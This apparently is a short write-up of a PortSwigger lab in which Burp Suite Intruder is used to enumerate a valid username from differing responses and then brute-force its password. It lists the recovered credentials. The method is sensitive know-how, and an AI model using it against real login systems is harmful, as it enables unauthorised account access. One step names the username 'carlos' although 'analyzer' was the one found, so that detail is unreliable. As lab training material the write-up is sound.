Username enumeration via different responses
https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses
Last updated
https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses
Last updated
We can click on My Account
in order to login.
We can view the Proxy > HTTP History
in Burp Suite to view this request.
Let's forward it to the Intruder
and add a payload field to the username
parameter.
Next we can go to the Payloads
tab and set the Payload type
to Simple list
. Once that is done, we can paste the usernames provided to us here in the Payloads settings
section.
Let's start the attack.
We can observe that the request with username
set to analyzer
returned a different response than the others. This is because this username was correct whereas the others weren't.
Now we can craft another attack by setting the username
parameter to carlos
and adding a payload field to the password
parameter.
In the Payloads
tab we will again be using a Simple list
. Let's paste the passwords provided to use here in the Paeyloads section
.
We are now set to start the attack.
As we can see, the request with the password
set to 1234567890
gives a 302
response. Now that we know what the username and password are, let's login.
We have solved the lab.
Username | Password |
---|---|
analyzer
1234567890